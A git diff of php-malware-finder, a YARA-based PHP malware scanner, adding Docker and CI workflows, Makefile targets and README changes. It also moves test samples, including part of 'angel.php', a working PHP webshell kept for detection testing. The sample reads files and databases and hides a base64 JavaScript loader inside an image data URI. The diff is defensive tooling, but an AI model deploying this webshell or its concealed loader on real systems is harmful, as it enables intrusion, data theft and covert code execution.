54 files changed, 16938 insertions, 16697 deletions

diff --git a/.dockerignore b/.dockerignore
new file mode 100644
index 0000000..c454426
--- /dev/null
+++ b/.dockerignore
@@ -0,0 +1,4 @@
+.idea/
+.github/
+utils/
+php-malware-finder
diff --git a/.github/workflows/docker.yml b/.github/workflows/docker.yml
new file mode 100644
index 0000000..b44e0b7
--- /dev/null
+++ b/.github/workflows/docker.yml
@@ -0,0 +1,41 @@
+name: Docker
+
+on:
+  push:
+    branches:
+      - master
+    tags:
+      - '*'
+  pull_request:
+    branches:
+      - master
+
+jobs:
+
+  docker-image:
+    name: Build Image
+    runs-on: ubuntu-latest
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v3
+
+      - name: Setup docker
+        uses: docker/setup-buildx-action@v1
+
+      - name: Log into container registry
+        uses: docker/login-action@v1
+        with:
+          registry: ghcr.io
+          username: ${{ github.repository_owner }}
+          password: ${{ secrets.GITHUB_TOKEN }}
+
+      - name: Build image
+        run: make docker
+
+      - name: Test image
+        run: make docker-tests
+
+      - name: Publish image
+        if: github.event_name != 'pull_request'
+        run: make docker-publish
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
new file mode 100644
index 0000000..6b1647a
--- /dev/null
+++ b/.github/workflows/release.yml
@@ -0,0 +1,40 @@
+name: Release
+
+on:
+  push:
+    tags:
+      - '*'
+
+jobs:
+
+  release:
+    name: Release
+    runs-on: ubuntu-latest
+
+    steps:
+      - uses: actions/checkout@v3
+
+      - name: Set up Go
+        uses: actions/setup-go@v3
+        with:
+          go-version: '^1.18'
+
+      # apt repos don't have YARA v4.2, install it from git
+      - name: Install YARA
+        run: |
+          git clone --depth 1 https://github.com/virustotal/yara.git
+          cd yara
+          bash ./build.sh
+          sudo make install
+          cd ..
+
+      - name: Build
+        run: make
+
+      - name: Create release
+        uses: ncipollo/release-action@v1
+        with:
+          artifacts: "php-malware-finder"
+          token: ${{ secrets.GITHUB_TOKEN }}
+          allowUpdates: true
+          omitBody:  true
diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
index f29e422..a3cbc35 100644
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -9,17 +9,25 @@ on:
       - master
 
 jobs:
+
   test:
     name: Test
     runs-on: ubuntu-latest
+    strategy:
+      matrix:
+        go_version:
+          - '~1.16'
+          - '~1.17'
+          - '^1.18'
+
     steps:
       - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3
       
       - name: Setup Go
-        uses: actions/setup-go@v2
+        uses: actions/setup-go@v3
         with:
-          go-version: '^1.17'
+          go-version: ${{ matrix.go_version }}
 
       # apt repos don't have YARA v4.2, install it from git
       - name: Install YARA
@@ -32,4 +40,7 @@ jobs:
 
       - name: Run tests
         run: |
-          LD_LIBRARY_PATH=/usr/local/lib make tests
+          make
+          make tests
+        env:
+          LD_LIBRARY_PATH: /usr/local/lib
diff --git a/.gitignore b/.gitignore
index 639d072..de3cb87 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,2 +1,2 @@
-php-malware-finder/phpmalwarefinder
+php-malware-finder
 .idea
diff --git a/Dockerfile b/Dockerfile
new file mode 100644
index 0000000..e13b19d
--- /dev/null
+++ b/Dockerfile
@@ -0,0 +1,37 @@
+FROM golang:alpine as build
+WORKDIR /app
+
+# install build dependencies
+RUN apk add --no-cache \
+    build-base \
+    automake \
+    autoconf \
+    pkgconfig \
+    libtool \
+    bison \
+    libressl-dev \
+    git
+
+# install YARA
+RUN git clone --depth 1 https://github.com/virustotal/yara.git \
+    && cd yara \
+    && sh ./build.sh \
+    && make install \
+    && cd ..
+
+# copy and build PMF
+COPY . .
+RUN make
+
+FROM golang:alpine
+LABEL org.opencontainers.image.source="https://github.com/jvoisin/php-malware-finder"
+WORKDIR /app
+
+# install dependencies
+RUN apk add --no-cache libressl
+
+# copy files from build container
+COPY --from=build /usr/local/lib /usr/lib
+COPY --from=build /app/php-malware-finder /app
+
+ENTRYPOINT ["/app/php-malware-finder", "-v", "-a", "-c", "/data"]
diff --git a/Makefile b/Makefile
index 931f4e7..8cdf2fd 100644
--- a/Makefile
+++ b/Makefile
@@ -1,15 +1,48 @@
-.PHONY: clean deps tests
+.PHONY: clean rebuild update-deps tests help docker docker-tests docker-publish
 
-all: php-malware-finder/phpmalwarefinder
+NAME := php-malware-finder
+TAG_COMMIT := $(shell git rev-list --abbrev-commit --all --max-count=1)
+VERSION := $(shell git describe --abbrev=0 --tags --exact-match $(TAG_COMMIT) 2>/dev/null || true)
+IMAGE_VERSION := $(VERSION)
+DATE := $(shell git log -1 --format=%cd --date=format:"%Y%m%d%H%M")
+ifeq ($(VERSION),)
+    VERSION := $(DATE)
+    IMAGE_VERSION := latest
+endif
+LDFLAGS := "-X main.version=$(VERSION)"
+GO_FLAGS := -o $(NAME) -ldflags $(LDFLAGS)
+IMAGE_REGISTRY := ghcr.io
+IMAGE_REGISTRY_USER := jvoisin
+IMAGE_NAME := $(IMAGE_REGISTRY)/$(IMAGE_REGISTRY_USER)/$(NAME)
 
-php-malware-finder/phpmalwarefinder:
-        go build -o php-malware-finder/phpmalwarefinder php-malware-finder/phpmalwarefinder.go
+all: php-malware-finder
 
-clean:
-        rm -f php-malware-finder/phpmalwarefinder
+php-malware-finder: ## Build application
+        @go build $(GO_FLAGS) .
 
-deps:
-        go mod tidy -v
+clean: ## Delete build artifacts
+        @rm -f $(NAME)
 
-tests: php-malware-finder/phpmalwarefinder
-        @cd ./php-malware-finder && bash ./tests.sh
+rebuild: clean all ## Delete build artifacts and rebuild
+
+update-deps: ## Update dependencies
+        @go get -u .
+        @go mod tidy -v
+
+tests: php-malware-finder ## Run test suite
+        @bash ./tests.sh
+
+docker: ## Build docker image
+        docker pull $(IMAGE_NAME):latest || true
+        docker build --pull -t $(IMAGE_NAME):latest .
+        docker tag $(IMAGE_NAME):latest $(IMAGE_NAME):$(IMAGE_VERSION)
+
+docker-tests: ## Run docker image against the samples folder
+        @docker run --rm -v $(shell pwd)/data/samples:/data $(IMAGE_NAME):latest
+
+docker-publish: ## Push docker image to the container registry
+        @docker push $(IMAGE_NAME):latest
+        @(test "$(IMAGE_VERSION)" != "latest" && docker push $(IMAGE_NAME):$(IMAGE_VERSION)) || true
+
+help: ## Show this help
+        @grep -E '^[a-zA-Z_-]+:.*?## .*$$' $(MAKEFILE_LIST) | sort | awk 'BEGIN {FS = ":.*?## "}; {printf "\033[36m%-20s\033[0m %s\n", $$1, $$2}'
diff --git a/README.md b/README.md
index 6ae0b07..2ee0606 100644
--- a/README.md
+++ b/README.md
@@ -60,22 +60,28 @@ PMF tries as much as possible to use semantic patterns, to detect things like
 and then passed to some dangerous function like `system`".
 
 ## Installation
+
+### From source
+
 - Install Go (using your package manager, or [manually](https://go.dev/doc/install))
 - Install libyara >= 4.2 (using your package manager, or [from source](https://yara.readthedocs.io/en/stable/gettingstarted.html))
 - Download php-malware-finder: `git clone https://github.com/jvoisin/php-malware-finder.git`
 - Build php-malware-finder: `cd php-malware-finder && make`
 
+or replace the last 2 steps with `go install github.com/jvoisin/php-malware-finder`,
+which will directly compile and install PMF in your `${GOROOT}/bin` folder.
+
 ## How to use it?
 
 ```
-$ ./phpmalwarefinder -h
+$ ./php-malware-finder -h
 Usage:
-  phpmalwarefinder [OPTIONS] [Target]
+  php-malware-finder [OPTIONS] [Target]
 
 Application Options:
-  -r, --rules-dir=      Rules location (default: /etc/phpmalwarefinder or .)
+  -r, --rules-dir=      Alternative rules location (default: embedded rules)
   -a, --show-all        Display all matched rules
-  -f, --fast            Enable YARA's fast mode'
+  -f, --fast            Enable YARA's fast mode
   -R, --rate-limit=     Max. filesystem ops per second, 0 for no limit (default: 0)
   -v, --verbose         Verbose mode
   -w, --workers=        Number of workers to spawn for scanning (default: 32)
@@ -84,6 +90,7 @@ Application Options:
   -i, --exclude-imgs    Do not scan image files
   -x, --exclude-ext=    Additional file extensions to exclude
   -u, --update          Update rules
+  -V, --version         Show version number and exit
 
 Help Options:
   -h, --help            Show this help message
@@ -92,7 +99,7 @@ Help Options:
 Or if you prefer to use `yara`:
 
 ```
-$ yara -r ./php.yar /var/www
+$ yara -r ./data/php.yar /var/www
 ```
 
 Please keep in mind that you should use at least YARA 3.4 because we're using
@@ -103,6 +110,16 @@ have support for hashes.
 
 Oh, and by the way, you can run the *comprehensive* testsuite with `make tests`.
 
+### Docker
+
+If you want to avoid having to install Go and libyara, you can also use our
+docker image and simply mount the folder you want to scan to the container's
+`/data` directory:
+
+```
+$ docker run --rm -v /folder/to/scan:/data ghcr.io/jvoisin/php-malware-finder
+```
+
 ## Whitelisting
 
 Check the [whitelist.yar](https://github.com/jvoisin/php-malware-finder/blob/master/php-malware-finder/whitelist.yar) file.
@@ -115,7 +132,7 @@ Because:
 - It doesn't use [a single rule per sample](
   https://github.com/Neo23x0/signature-base/blob/e264d66a8ea3be93db8482ab3d639a2ed3e9c949/yara/thor-webshells.yar
   ), since it only cares about finding malicious patterns, not specific webshells
-- It has a [complete testsuite](https://travis-ci.org/jvoisin/php-malware-finder), to avoid regressions
+- It has a [complete testsuite](https://github.com/jvoisin/php-malware-finder/actions), to avoid regressions
 - Its whitelist system doesn't rely on filenames
 - It doesn't rely on (slow) [entropy computation]( https://en.wikipedia.org/wiki/Entropy_(information_theory) )
 - It uses a ghetto-style static analysis, instead of relying on file hashes
diff --git a/php-malware-finder/php.yar b/data/php.yar
index 4470e1b..4470e1b 100644
--- a/php-malware-finder/php.yar
+++ b/data/php.yar
diff --git a/php-malware-finder/samples/artificial/bypasses.php b/data/samples/artificial/bypasses.php
index 9d849a4..9d849a4 100644
--- a/php-malware-finder/samples/artificial/bypasses.php
+++ b/data/samples/artificial/bypasses.php
diff --git a/php-malware-finder/samples/artificial/dodgy.php b/data/samples/artificial/dodgy.php
index e127588..e127588 100644
--- a/php-malware-finder/samples/artificial/dodgy.php
+++ b/data/samples/artificial/dodgy.php
diff --git a/php-malware-finder/samples/artificial/obfuscated.php b/data/samples/artificial/obfuscated.php
index fc66be8..fc66be8 100644
--- a/php-malware-finder/samples/artificial/obfuscated.php
+++ b/data/samples/artificial/obfuscated.php
diff --git a/php-malware-finder/samples/classic/ajaxshell.php b/data/samples/classic/ajaxshell.php
index 0445858..0445858 100644
--- a/php-malware-finder/samples/classic/ajaxshell.php
+++ b/data/samples/classic/ajaxshell.php
diff --git a/php-malware-finder/samples/classic/angel.php b/data/samples/classic/angel.php
index 28a1c79..fdec11e 100644
--- a/php-malware-finder/samples/classic/angel.php
+++ b/data/samples/classic/angel.php
@@ -1,2149 +1,2149 @@
-<?php

-error_reporting(7);

-@set_magic_quotes_runtime(0);

-ob_start();

-$mtime = explode(' ', microtime());

-$starttime = $mtime[1] + $mtime[0];

-define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');

-define('IS_WIN', DIRECTORY_SEPARATOR == '\\');

-define('IS_COM', class_exists('COM') ? 1 : 0 );

-define('IS_GPC', get_magic_quotes_gpc());

-$dis_func = get_cfg_var('disable_functions');

-define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );

-@set_time_limit(0);

-

-foreach($_POST as $key => $value) {

-        if (IS_GPC) {

-                $value = s_array($value);

-        }

-        $$key = $value;

-}

-/*===================== ³ÌÐòÅäÖà =====================*/

-

-//echo encode_pass('angel');exit;

-//angel = ec38fe2a8497e0a8d6d349b3533038cb

-// Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë,Áô¿ÕΪ²»ÐèÒªÑéÖ¤

-$pass  = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel

-

-//ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓÐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÐÞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ

-// cookie ǰ׺

-$cookiepre = '';

-// cookie ×÷ÓÃÓò

-$cookiedomain = '';

-// cookie ×÷Ó÷¾¶

-$cookiepath = '/';

-// cookie ÓÐЧÆÚ

-$cookielife = 86400;

-

-//³ÌÐòËÑË÷¿ÉдÎļþµÄÀàÐÍ

-!$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp';

-/*===================== ÅäÖýáÊø =====================*/

-

-$charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8');

-if ($charset == 'utf8') {

-        header("content-Type: text/html; charset=utf-8");

-} elseif ($charset == 'big5') {

-        header("content-Type: text/html; charset=big5");

-} elseif ($charset == 'gbk') {

-        header("content-Type: text/html; charset=gbk");

-} elseif ($charset == 'latin1') {

-        header("content-Type: text/html; charset=iso-8859-2");

-} elseif ($charset == 'euc-kr') {

-        header("content-Type: text/html; charset=euc-kr");

-} elseif ($charset == 'euc-jp') {

-        header("content-Type: text/html; charset=euc-jp");

-}

-

-$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];

-$timestamp = time();

-

-/*===================== Éí·ÝÑéÖ¤ =====================*/

-if ($action == "logout") {

-        scookie('loginpass', '', -86400 * 365);

-        @header('Location: '.$self);

-        exit;

-}

-if($pass) {

-        if ($action == 'login') {

-                if ($pass == encode_pass($password)) {

-                        scookie('loginpass',encode_pass($password));

-                        @header('Location: '.$self);

-                        exit;

-                }

-        }

-        if ($_COOKIE['loginpass']) {

-                if ($_COOKIE['loginpass'] != $pass) {

-                        loginpage();

-                }

-        } else {

-                loginpage();

-        }

-}

-/*===================== ÑéÖ¤½áÊø =====================*/

-

-$errmsg = '';

-!$action && $action = 'file';

-

-// ²é¿´PHPINFO

-if ($action == 'phpinfo') {

-        if (IS_PHPINFO) {

-                phpinfo();

-                exit;

-        } else {

-                $errmsg = 'phpinfo() function has non-permissible';

-        }

-}

-

-// ÏÂÔØÎļþ

-if ($doing == 'downfile' && $thefile) {

-        if (!@file_exists($thefile)) {

-                $errmsg = 'The file you want Downloadable was nonexistent';

-        } else {

-                $fileinfo = pathinfo($thefile);

-                header('Content-type: application/x-'.$fileinfo['extension']);

-                header('Content-Disposition: attachment; filename='.$fileinfo['basename']);

-                header('Content-Length: '.filesize($thefile));

-                @readfile($thefile);

-                exit;

-        }

-}

-

-// Ö±½ÓÏÂÔر¸·ÝÊý¾Ý¿â

-if ($doing == 'backupmysql' && !$saveasfile) {

-        if (!$table) {

-                $errmsg ='Please choose the table';

-        } else {

-                $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);

-                $filename = basename($dbname.'.sql');

-                header('Content-type: application/unknown');

-                header('Content-Disposition: attachment; filename='.$filename);

-                foreach($table as $k => $v) {

-                        if ($v) {

-                                sqldumptable($v);

-                        }

-                }

-                mysql_close();

-                exit;

-        }

-}

-

-// ͨ¹ýMYSQLÏÂÔØÎļþ

-if($doing=='mysqldown'){

-        if (!$dbname) {

-                $errmsg = 'Please input dbname';

-        } else {

-                $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);

-                if (!file_exists($mysqldlfile)) {

-                        $errmsg = 'The file you want Downloadable was nonexistent';

-                } else {

-                        $result = q("select load_file('$mysqldlfile');");

-                        if(!$result){

-                                q("DROP TABLE IF EXISTS tmp_angel;");

-                                q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");

-                                //ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁÈ¡×ÔÉí»ò°üº¬__angel_1111111111_eof__µÄÎļþʱ²»ÍêÕûµÄÇé¿ö

-                                q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");

-                                $result = q("select content from tmp_angel");

-                                q("DROP TABLE tmp_angel");

-                        }

-                        $row = @mysql_fetch_array($result);

-                        if (!$row) {

-                                $errmsg = 'Load file failed '.mysql_error();

-                        } else {

-                                $fileinfo = pathinfo($mysqldlfile);

-                                header('Content-type: application/x-'.$fileinfo['extension']);

-                                header('Content-Disposition: attachment; filename='.$fileinfo['basename']);

-                                header("Accept-Length: ".strlen($row[0]));

-                                echo $row[0];

-                                exit;

-                        }

-                }

-        }

-}

-

-?>

-<html>

-<head>

-<meta http-equiv="Content-Type" content="text/html; charset=gbk">

-<title><?php echo $action.' - '.$_SERVER['HTTP_HOST'];?></title>

-<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>

-<style type="text/css">

-body,td{font: 12px Arial,Tahoma;line-height: 16px;}

-.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}

-.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}

-.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}

-a {color: #00f;text-decoration:underline;}

-a:hover{color: #f00;text-decoration:none;}

-.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}

-.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}

-.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;}

-.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}

-.head td span{font-weight:normal;}

-.infolist {padding:10px;margin:10px 0 20px 0;background:#F1F1F1;border:1px solid #ddd;}

-form{margin:0;padding:0;}

-h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}

-ul.info li{margin:0;color:#444;line-height:24px;height:24px;}

-u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}

-.drives{padding:5px;}

-.drives span {margin:auto 7px;}

-</style>

-<script type="text/javascript">

-if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};

-setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(5);}, 500);

-</script>

-<script type="text/javascript">

-function CheckAll(form) {

-        for(var i=0;i<form.elements.length;i++) {

-                var e = form.elements[i];

-                if (e.name != 'chkall')

-                e.checked = form.chkall.checked;

-    }

-}

-function $(id) {

-        return document.getElementById(id);

-}

-function createdir(){

-        var newdirname;

-        newdirname = prompt('Please input the directory name:', '');

-        if (!newdirname) return;

-        $('createdir').newdirname.value=newdirname;

-        $('createdir').submit();

-}

-function fileperm(pfile){

-        var newperm;

-        newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');

-        if (!newperm) return;

-        $('fileperm').newperm.value=newperm;

-        $('fileperm').pfile.value=pfile;

-        $('fileperm').submit();

-}

-function copyfile(sname){

-        var tofile;

-        tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');

-        if (!tofile) return;

-        $('copyfile').tofile.value=tofile;

-        $('copyfile').sname.value=sname;

-        $('copyfile').submit();

-}

-function rename(oldname){

-        var newfilename;

-        newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');

-        if (!newfilename) return;

-        $('rename').newfilename.value=newfilename;

-        $('rename').oldname.value=oldname;

-        $('rename').submit();

-}

-function dofile(doing,thefile,m){

-        if (m && !confirm(m)) {

-                return;

-        }

-        $('filelist').doing.value=doing;

-        if (thefile){

-                $('filelist').thefile.value=thefile;

-        }

-        $('filelist').submit();

-}

-function createfile(nowpath){

-        var filename;

-        filename = prompt('Please input the file name:', '');

-        if (!filename) return;

-        opfile('editfile',nowpath + filename,nowpath);

-}

-function opfile(action,opfile,dir){

-        $('fileopform').action.value=action;

-        $('fileopform').opfile.value=opfile;

-        $('fileopform').dir.value=dir;

-        $('fileopform').submit();

-}

-function godir(dir,view_writable){

-        if (view_writable) {

-                $('godir').view_writable.value=view_writable;

-        }

-        $('godir').dir.value=dir;

-        $('godir').submit();

-}

-function getsize(getdir,dir){

-        $('getsize').getdir.value=getdir;

-        $('getsize').dir.value=dir;

-        $('getsize').submit();

-}

-function editrecord(action, base64, tablename){

-        if (action == 'del') {          

-                if (!confirm('Is or isn\'t deletion record?')) return;

-        }

-        $('recordlist').doing.value=action;

-        $('recordlist').base64.value=base64;

-        $('recordlist').tablename.value=tablename;

-        $('recordlist').submit();

-}

-function moddbname(dbname) {

-        if(!dbname) return;

-        $('setdbname').dbname.value=dbname;

-        $('setdbname').submit();

-}

-function settable(tablename,doing,page) {

-        if(!tablename) return;

-        if (doing) {

-                $('settable').doing.value=doing;

-        }

-        if (page) {

-                $('settable').page.value=page;

-        }

-        $('settable').tablename.value=tablename;

-        $('settable').submit();

-}

-function s(action,nowpath,p1,p2,p3,p4,p5) {

-        if(action) $('opform').action.value=action;

-        if(nowpath) $('opform').nowpath.value=nowpath;

-        if(p1) $('opform').p1.value=p1;

-        if(p2) $('opform').p2.value=p2;

-        if(p3) $('opform').p3.value=p3;

-        if(p4) $('opform').p4.value=p4;

-        if(p5) $('opform').p4.value=p5;

-}

-function g(action,nowpath,p1,p2,p3,p4,p5) {

-        if(!action) return;

-        s(action,nowpath,p1,p2,p3,p4,p5);

-        $('opform').submit();

-}

-</script>

-</head>

-<body style="margin:0;table-layout:fixed; word-break:break-all">

-<?php

-formhead(array('name'=>'opform'));

-makehide('action', $action);

-makehide('nowpath', $nowpath);

-makehide('p1', $p1);

-makehide('p2', $p2);

-makehide('p3', $p3);

-makehide('p4', $p4);

-makehide('p5', $p5);

-formfoot();

-

-if(!function_exists('posix_getegid')) {

-        $user = @get_current_user();

-        $uid = @getmyuid();

-        $gid = @getmygid();

-        $group = "?";

-} else {

-        $uid = @posix_getpwuid(@posix_geteuid());

-        $gid = @posix_getgrgid(@posix_getegid());

-        $user = $uid['name'];

-        $uid = $uid['uid'];

-        $group = $gid['name'];

-        $gid = $gid['gid'];

-}

-

-?>

-<table width="100%" border="0" cellpadding="0" cellspacing="0">

-        <tr class="head">

-                <td><span style="float:right;"><?php echo @php_uname();?> / User:<?php echo $uid.' ( '.$user.' ) / Group: '.$gid.' ( '.$group.' )';?></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>

-        </tr>

-        <tr class="alt1">

-                <td>

-                        <span style="float:right;">PHP <?php echo PHP_VERSION;?> / Safe Mode:<?php echo getcfg('safe_mode');?></span>

-                        <a href="javascript:g('logout');">Logout</a> | 

